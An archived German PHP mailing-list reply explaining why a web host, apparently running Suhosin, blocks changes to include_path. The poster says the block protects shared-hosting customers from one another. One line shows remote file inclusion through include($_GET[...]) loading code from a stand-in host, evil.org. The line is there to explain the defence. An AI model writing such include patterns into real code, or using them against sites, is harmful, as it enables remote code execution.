[php] Webspace-Anbieter sperrt Änderung des include_path

klemens zwiskle at cable.vol.at
Do Apr 1 14:13:18 CEST 2010

...ich kenn das im zusammenhang mit SUHOSIN. (hardend-php.net)

http://serversupportforum.de/forum/perl-php-python-bash/23196-php-ini_set-fuer-include_path.html

Demnach sollten einige der parameter ev. per .htaccess änderbar sein,
aber nicht per <?php ini_set() ?>.
(kann aber je nach dem vom Serverbetreiber auch komplett abeschaltet
werden... )

Das ganze ist warscheinich weniger gängelung der Kunden, sondern um die
sicherheit zu erhöhen. (e.v. auch im shared-server bereich, um da nicht
aus seinem "käfig" auszubrechen und nachbar-kunden zu hacken)

Um code einzschleusen ist include() beliebt.
include($_GET['param1']) --> include("http://evil.org/expoit.php");

.ka

php::bar PHP Wiki   -   Listenarchive